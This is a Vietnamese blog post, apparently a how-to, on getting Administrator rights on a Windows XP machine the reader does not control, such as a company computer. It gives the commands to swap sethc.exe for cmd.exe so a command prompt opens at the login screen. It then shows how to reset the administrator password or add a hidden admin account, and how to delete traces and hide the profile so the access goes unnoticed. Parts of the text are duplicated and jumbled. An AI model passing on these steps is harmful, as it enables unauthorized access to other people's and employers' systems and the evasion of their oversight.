Làm gì khi máy tính bạn không có quyền Administrator
[ Ji Nguyễn ] Đôi lúc bạn muốn cài vào chiếc máy tính của mình một vài tiện ích thông dụng nhưng các phần mềm này lại có liên quan đến quyền quản trị mạng (nhất là các phần mềm diệt virus, trình window media player hay internet explorer bản mới, vv...) nhưng ngặt nỗi là bạn không có quyền quản trị tối cao của chiếc máy (quyền Administrator) và cũng không có password của "Anh chàng này" hoặc bạn chỉ là nhân viên của một công ty và máy tính bạn không có quyền Administrator. Làm thế nào bây giờ? Cách duy nhất là...hack password Administrator thôi!
Trong Windows XP có 1 chương trình gọi là StickyKey, muốn mở nó thì chúng ta chỉ cần ấn phím Shift 5 lần là được. File thực thi chương trình này là C:\windows\System32\sethc.exe
Chúng ta sẽ hack password từ lỗ hỏng này.
- Vào Run gõ CMD, tiếp tục gõ:
Bạn cũng có thể chép đoạn mã trên vào notepad rồi lưu lại với tên crack.cmd. Sau đó nhấp kép vào để thực thi.
- Log off user đang dùng, từ cửa sổ chờ Login vào Windows nhấp Shift 5 lần, nếu bạn thấy chương trình Command Prompt hiện lên là đã thành công. Tại đây chúng ta có toàn quyền đối với các User có trên máy.
- Dùng lệnh net user để thấy các user đang có trên máy (kể cả các user ẩn). Tạo một tài khoản mới và gán nó vào group Administrator (khuyến cáo không nên xóa password administrator):
Vào Run, gõ lệnh :
Boot máy, tới giao diện đăng nhập thì nhấn phím Shift 5 lần để gọi CMD.
- Sau khi có được cmd thì gõ lệnh sau để reset password thành 123
- Để tránh trường hợp bị phát hiện là đã bị đổi pass, bạn add thêm user tên mình và gán vào group Administrators
Lúc này thì bạn đã có thể dùng máy thoải mái
Trong Windows XP có 1 chương trình gọi là StickyKey, muốn mở nó thì chúng ta chỉ cần ấn phím Shift 5 lần là được. File thực thi chương trình này là C:\windows\System32\sethc.exe
Chúng ta sẽ hack password từ lỗ hỏng này.
- Vào Run gõ CMD, tiếp tục gõ:
cd %systemroot%/system32 //vào thư mục system32
rename sethc.exe sethc.exe.bak //đổi tên sethc.exe thành sethc.bak
copy cmd.exe sethc.exe /y // thay thế file sethc.exe thành file cmd.exe
Bạn cũng có thể chép đoạn mã trên vào notepad rồi lưu lại với tên crack.cmd. Sau đó nhấp kép vào để thực thi.
- Log off user đang dùng, từ cửa sổ chờ Login vào Windows nhấp Shift 5 lần, nếu bạn thấy chương trình Command Prompt hiện lên là đã thành công. Tại đây chúng ta có toàn quyền đối với các User có trên máy.
- Dùng lệnh net user để thấy các user đang có trên máy (kể cả các user ẩn). Tạo một tài khoản mới và gán nó vào group Administrator (khuyến cáo không nên xóa password administrator):
net user_tên tài khoản_password /addTới đây thì bạn có thể dùng user vừa tạo để làm những gì mình muốn mà không cần khởi động lại máy!
net localgroup Administrators _tên tài khoản /add
Sau khi dùng xong bạn nên xóa user đó đi để tránh bị phát hiện và ẩn profile ứng với tài khoản vừa tạo điMột cách khác bạn có thể làm: Reset password administrator
net user_tên tài khoản /delete
attrib +s +h +r C:\Documents and Settings\tên tài khoản
Vào Run, gõ lệnh :
cd C:\WINDOWS\system32 copy cmd.exe sethc.exe
Boot máy, tới giao diện đăng nhập thì nhấn phím Shift 5 lần để gọi CMD.
- Sau khi có được cmd thì gõ lệnh sau để reset password thành 123
Code:
Quotation net user DaoDuyHieu 123
Code:
net user teo 123 /add net localgroup Administrators teo /add
Tin liên quan
Comments[ 0 ]
Đăng nhận xét
- Nghiêm cấm nói tục, chửi thề trong blog. Mọi hành vi vô văn hóa không được chấp nhận trong blog này.
- Không sex, quảng bá trang web cấm tại đây.
- Các bài viết phải tuân thủ yêu cầu tiếng việt, đầy đủ dấu.
- Bạn có thể sử dụng các thẻ html cơ bản cho comment của mình